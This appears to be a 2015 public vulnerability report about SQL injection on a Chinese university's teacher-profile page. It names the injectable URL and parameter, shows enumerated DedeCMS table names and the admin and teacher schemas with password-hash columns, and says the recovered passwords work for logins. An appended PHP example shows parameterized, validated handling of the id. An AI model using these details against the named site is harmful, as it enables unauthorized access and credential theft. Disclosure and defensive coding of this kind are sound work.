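2015-05-26: Details reported to the vendor; awaiting vendor response
2015-05-31: The vendor actively ignored the vulnerability; details disclosed to the public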
SQL injection
The teacher introduction page is vulnerable to SQL injection
Injection point
http://au.cug.edu.cn/jsxx/jsxx.php?mid=27
Enumerating the tables
Database: autoxyweb
[90 tables]
+---------------------+
| dede_addonarticle   |
| dede_addonimages    |
| dede_addoninfos     |
| dede_addonshop      |
| dede_addonsoft      |
| dede_addonspec      |
| dede_admin          |
| dede_admintype      |
| dede_advancedsearch |
| dede_arcatt         |
| dede_arccache       |
| dede_archives       |
| dede_arcmulti       |
| dede_arcrank        |
| dede_arctiny        |
| dede_arctype        |
| dede_area           |
| dede_channeltype    |
Columns
Database: autoxyweb
Table: dede_admin
[10 columns]
+-----------+------------------+
| Column    | Type             |
+-----------+------------------+
| email     | char(30)         |
| id        | int(10) unsigned |
| loginip   | varchar(20)      |
| logintime | int(10) unsigned |
| pwd       | char(32)         |
| tname     | char(30)         |
| typeid    | text             |
| uname     | char(20)         |
| userid    | char(30)         |
| usertype  | float unsigned   |
+-----------+------------------+
Teacher information table
+--------------+-----------------------+
| Column       | Type                  |
+--------------+-----------------------+
| checkmail    | smallint(6)           |
| cs           | mediumtext            |
| email        | char(50)              |
| exptime      | smallint(6)           |
| face         | char(50)              |
| joinip       | char(16)              |
| jointime     | int(10) unsigned      |
| loginip      | char(16)              |
| logintime    | int(10) unsigned      |
| matt         | smallint(5) unsigned  |
| mid          | mediumint(8) unsigned |
| money        | mediumint(8) unsigned |
| mtype        | varchar(20)           |
| pwd          | char(32)              |
| rank         | smallint(5) unsigned  |
| safeanswer   | char(30)              |
| safequestion | smallint(5) unsigned  |
| scores       | mediumint(8) unsigned |
| sex          | enum('男','女','保密')   |
| spacesta     | smallint(6)           |
| uname        | char(36)              |
| uptime       | int(11)               |
+--------------+-----------------------+
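Some of these passwords can also be used to log in to the teacher management system; I won't post the screenshots. The backend turned out to be DedeCMS.
I did not go on to get a webshell or do anything beyond that.
You know the rest.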
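Hardened handling of an integer id parameter such as mid, shown as an added example; it is not code from this report or from the affected site. It assumes the mid parameter maps to the mid column (mediumint(8) unsigned) listed above; the table name teacher_info, the sample rows and the in-memory SQLite database are constructed for illustration.

```php
<?php
// Added example, not code from the report or the affected site.
// Assumptions: the table name teacher_info, the sample rows and the
// in-memory SQLite database are constructed; the site itself runs MySQL.
declare(strict_types=1);

const MID_MAX = 16777215; // largest MEDIUMINT UNSIGNED, the type of `mid` in the dump

// Return the id as an int, or null when the raw value is not a plain
// integer in range (arrays from ?mid[]=x and any trailing text are rejected).
function parse_mid($raw): ?int
{
    if (!is_string($raw)) {
        return null;
    }
    $mid = filter_var($raw, FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 1, 'max_range' => MID_MAX]]);
    return $mid === false ? null : $mid;
}

// Look up one profile with a bound parameter. Only display columns are
// selected, so pwd, safeanswer and loginip never reach the page layer.
function fetch_teacher(PDO $db, int $mid): ?array
{
    $stmt = $db->prepare('SELECT mid, uname FROM teacher_info WHERE mid = :mid');
    $stmt->bindValue(':mid', $mid, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

$db = new PDO('sqlite::memory:', null, null, [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
$db->exec('CREATE TABLE teacher_info (mid INTEGER PRIMARY KEY, uname TEXT, pwd TEXT)');
$db->exec("INSERT INTO teacher_info VALUES (27, 'teacher_a', 'constructed-hash')");

// Constructed request values: a valid id, an unknown id and four malformed ones.
foreach (['27', '99', "27'", '27 abc', '-1', ['27']] as $raw) {
    $mid = parse_mid($raw);
    if ($mid === null) {
        $result = '400 rejected';
    } else {
        $row = fetch_teacher($db, $mid);
        $result = $row === null ? '404 not found' : '200 ' . $row['uname'];
    }
    echo str_pad(json_encode($raw), 12), ' => ', $result, PHP_EOL;
}
```

Against MySQL, also set PDO::ATTR_EMULATE_PREPARES to false so the statement is prepared on the server, and connect with an account that has SELECT on the profile table only.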
Severity: no impact (ignored by vendor)
Ignored at: 2015-05-31 14:38
None yet